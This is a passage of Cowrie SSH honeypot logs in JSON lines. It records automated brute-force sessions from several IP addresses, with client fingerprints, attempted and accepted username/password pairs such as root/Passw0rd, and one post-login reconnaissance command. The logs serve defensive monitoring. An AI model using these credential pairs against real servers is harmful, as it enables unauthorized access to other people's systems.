2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:07:39.091073Z","src_ip":"212.227.125.160","session":"10d8debf8ae2"}
{"eventid":"cowrie.session.closed","duration":"19.5","message":"Connection lost after 19.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:39.677799Z","src_ip":"212.227.125.160","session":"4d1a9fedf83c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44670,"dst_ip":"1.2.3.4","dst_port":22,"session":"283da00cfa42","protocol":"ssh","message":"New connection: 212.227.235.229:44670 (1.2.3.4:22) [session: 283da00cfa42]","sensor":"my-vps","timestamp":"2025-08-31T03:07:41.336562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:41.337536Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"welcome","message":"login attempt [ftpuser/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:41.361955Z","src_ip":"212.227.125.160","session":"10d8debf8ae2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:41.585719Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:07:42.331144Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:42.815678Z","src_ip":"212.227.125.160","session":"10d8debf8ae2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:07:42.847236Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:07:42.848018Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:43.097603Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:43.098838Z","src_ip":"212.227.235.229","session":"283da00cfa42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32952,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cb6e58efad3","protocol":"ssh","message":"New connection: 212.227.235.229:32952 (1.2.3.4:22) [session: 6cb6e58efad3]","sensor":"my-vps","timestamp":"2025-08-31T03:07:43.227290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:45.609854Z","src_ip":"212.227.235.229","session":"6cb6e58efad3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:45.642542Z","src_ip":"212.227.235.229","session":"6cb6e58efad3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52138,"dst_ip":"1.2.3.4","dst_port":22,"session":"656f8c4c5e4c","protocol":"ssh","message":"New connection: 41.226.27.251:52138 (1.2.3.4:22) [session: 656f8c4c5e4c]","sensor":"my-vps","timestamp":"2025-08-31T03:07:46.633844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:46.634850Z","src_ip":"41.226.27.251","session":"656f8c4c5e4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:46.676795Z","src_ip":"41.226.27.251","session":"656f8c4c5e4c"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:46.851742Z","src_ip":"41.226.27.251","session":"656f8c4c5e4c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:48.129565Z","src_ip":"41.226.27.251","session":"656f8c4c5e4c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:56.517253Z","src_ip":"212.227.235.229","session":"6cb6e58efad3"}
{"eventid":"cowrie.session.closed","duration":"19.7","message":"Connection lost after 19.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:02.888293Z","src_ip":"212.227.235.229","session":"6cb6e58efad3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43112,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b627a9d20c","protocol":"ssh","message":"New connection: 41.226.27.251:43112 (1.2.3.4:22) [session: 34b627a9d20c]","sensor":"my-vps","timestamp":"2025-08-31T03:08:06.891113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:06.916356Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:08:06.941052Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:08:07.137614Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:08:07.254195Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:08:07.254963Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:07.323756Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:07.325009Z","src_ip":"41.226.27.251","session":"34b627a9d20c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34386,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce5483e2bf4","protocol":"ssh","message":"New connection: 212.227.125.160:34386 (1.2.3.4:22) [session: cce5483e2bf4]","sensor":"my-vps","timestamp":"2025-08-31T03:08:08.731987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:14.287149Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:08:14.288500Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48816,"dst_ip":"1.2.3.4","dst_port":22,"session":"24277d8c8426","protocol":"ssh","message":"New connection: 212.227.235.229:48816 (1.2.3.4:22) [session: 24277d8c8426]","sensor":"my-vps","timestamp":"2025-08-31T03:08:16.344861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:17.051122Z","src_ip":"212.227.235.229","session":"24277d8c8426"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:08:17.051918Z","src_ip":"212.227.235.229","session":"24277d8c8426"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:08:23.056427Z","src_ip":"212.227.235.229","session":"24277d8c8426"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:08:23.787085Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:24.809910Z","src_ip":"212.227.235.229","session":"24277d8c8426"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41418,"dst_ip":"1.2.3.4","dst_port":22,"session":"341f02b417a6","protocol":"ssh","message":"New connection: 41.226.27.251:41418 (1.2.3.4:22) [session: 341f02b417a6]","sensor":"my-vps","timestamp":"2025-08-31T03:08:26.944611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:26.971891Z","src_ip":"41.226.27.251","session":"341f02b417a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:08:26.993989Z","src_ip":"41.226.27.251","session":"341f02b417a6"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:08:27.186029Z","src_ip":"41.226.27.251","session":"341f02b417a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37142,"dst_ip":"1.2.3.4","dst_port":22,"session":"8168c657830d","protocol":"ssh","message":"New connection: 212.227.235.229:37142 (1.2.3.4:22) [session: 8168c657830d]","sensor":"my-vps","timestamp":"2025-08-31T03:08:27.375853Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:28.464714Z","src_ip":"41.226.27.251","session":"341f02b417a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:08:28.912291Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:08:28.913013Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:29.466186Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:08:29.467329Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:31.206729Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.session.closed","duration":"22.5","message":"Connection lost after 22.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:31.256098Z","src_ip":"212.227.125.160","session":"cce5483e2bf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38998,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d4380d16747","protocol":"ssh","message":"New connection: 212.227.125.160:38998 (1.2.3.4:22) [session: 2d4380d16747]","sensor":"my-vps","timestamp":"2025-08-31T03:08:37.383479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:38.115013Z","src_ip":"212.227.125.160","session":"2d4380d16747"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 